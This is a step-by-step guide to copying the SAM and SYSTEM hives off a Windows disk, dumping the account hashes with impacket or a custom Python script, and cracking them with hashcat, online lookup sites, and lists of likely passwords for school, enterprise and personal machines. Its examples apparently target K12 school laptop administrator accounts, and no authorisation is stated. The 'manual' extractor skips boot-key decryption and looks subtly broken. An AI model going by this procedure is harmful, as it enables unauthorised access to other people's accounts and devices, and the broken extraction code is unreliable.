# NT Hash Extraction from SAM (non-destructive)

## Why extract instead of clear

Windows detects offline SAM hive modifications and triggers automatic repair on every boot. Extracting the NT hash for cracking doesn't modify the SAM at all — no boot loop.

## Method 1 (recommended): Impacket secretsdump

This is the simplest and most reliable method — it handles the boot key decryption automatically.

**On the Debian machine** (or any Linux machine with pip):

```bash
# Copy SAM and SYSTEM hives from the mounted Windows partition via SSH
sshpass -p 'root' scp root@192.168.1.X:/mnt/Windows/System32/config/SAM /tmp/sam.hive
sshpass -p 'root' scp root@192.168.1.X:/mnt/Windows/System32/config/SYSTEM /tmp/system.hive

# Install impacket in a venv (PEP 668-safe)
python3 -m venv /tmp/hackenv
/tmp/hackenv/bin/pip install impacket

# Dump hashes
/tmp/hackenv/bin/secretsdump.py -sam /tmp/sam.hive -system /tmp/system.hive LOCAL
```

**Example output:**
```
[*] Target system bootKey: 0x16d5d2029fa1eeaa1af2e5676697fdd1
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d08ce74d5ef3d7886d8e5ce5f2e648a9:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Student:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
K12 Admin:1002:aad3b435b51404eeaad3b435b51404ee:d08ce74d5ef3d7886d8e5ce5f2e648a9:::
```

The `31d6cfe0d16ae931b73c59d7e0c089c0` hash = **blank password** (no password). The LM hash `aad3b435b51404eeaad3b435b51404ee` also = no LM hash.

## Method 2: Manual Python extraction (no external deps)

SystemRescue has Python 3.14.5 but may not have impacket. Use this fallback from the SSH session:

```bash
mount /dev/sda2 /mnt
python3 << 'EOF'
import struct

def extract_nt_hash(sam_path, rid):
    with open(sam_path, 'rb') as f:
        data = f.read()
    rid_bytes = struct.pack('<I', rid)
    idx = data.find(rid_bytes)
    if idx == -1:
        return None
    for offset in range(max(0, idx-4096), min(len(data), idx+4096)):
        if data[offset:offset+2] == b'\x66\x00':
            hash_off = offset + 0x9C
            if hash_off + 16 <= len(data):
                h = data[hash_off:hash_off+16]
                if h != b'\x00' * 16:
                    return h.hex().upper()
    return None

# Common RIDs: 0x1f4=Admin, 0x3e9=User1, 0x3ea=User2, 0x3eb=User3
users = {0x1f4: 'Administrator', 0x3e9: 'User1', 0x3ea: 'User2', 0x3eb: 'User3'}
for rid, name in users.items():
    h = extract_nt_hash('/mnt/Windows/System32/config/SAM', rid)
    if h:
        print(f'{name} (RID {rid:#06x}): NT:{h}')
    else:
        print(f'{name} (RID {rid:#06x}): no hash found')
EOF
```

## Cracking the hash

| Method | URL/Tool | Notes |
|---|---|---|
| Online lookup | https://ntlm.pw/ | 8.7B+ unique hashes, free, no signup, just paste and click |
| Online lookup | https://crackstation.net/ | Free, huge rainbow table DB |
| Online lookup | https://hashes.com/ | Also good, requires free account |
| Hashcat | `hashcat -m 1000 <hash> rockyou.txt` | Offline, needs wordlist |
| Python + Cryptodome | `pip install pycryptodomex; python3 -c "from Cryptodome.Hash import MD4; ..."` | For testing common passwords locally |
| Empty password check | `31D6CFE0D16AE931B73C59D7E0C089C0` | This hash = blank password |

**If NTLM.PW returns `[not found]`** (even with 8.7B hashes), the password is uncommon. Try larger wordlists or use the utilman.exe trick instead.

## Common password patterns to test

Use when you have pycryptodomex available to generate NTLM hashes locally:

```python
from Cryptodome.Hash import MD4
for pw in ['student123', 'Password123', 'k12admin', 'Admin123',
           'welcome', 'changeme', 'school', 'password']:
    h = MD4.new(pw.encode('utf-16le')).hexdigest()
    if h == target_hash:
        print(f'FOUND: {pw}')
```

Common patterns by machine type:
- **School/K12 laptops**: `student`, `Student123`, `Password123`, blank, school name
- **Enterprise**: `Password1`, `Password123`, `P@ssw0rd`, `changeme`
- **Personal**: often blank, `password`, user's name, or try the user's first name

## When extraction fails

- **Dirty NTFS volume**: mount with `-o ro,force` — `mount -t ntfs /dev/sdX /mnt -o ro,force`
- **BitLocker**: SystemRescue can't mount BitLocker volumes. You'll need the recovery key.
- **Corrupted SAM**: Try `chntpw -l SAM` first to verify the hive is readable; if it fails, the hive is damaged and you'll need to restore from `\Windows\System32\config\RegBack\`
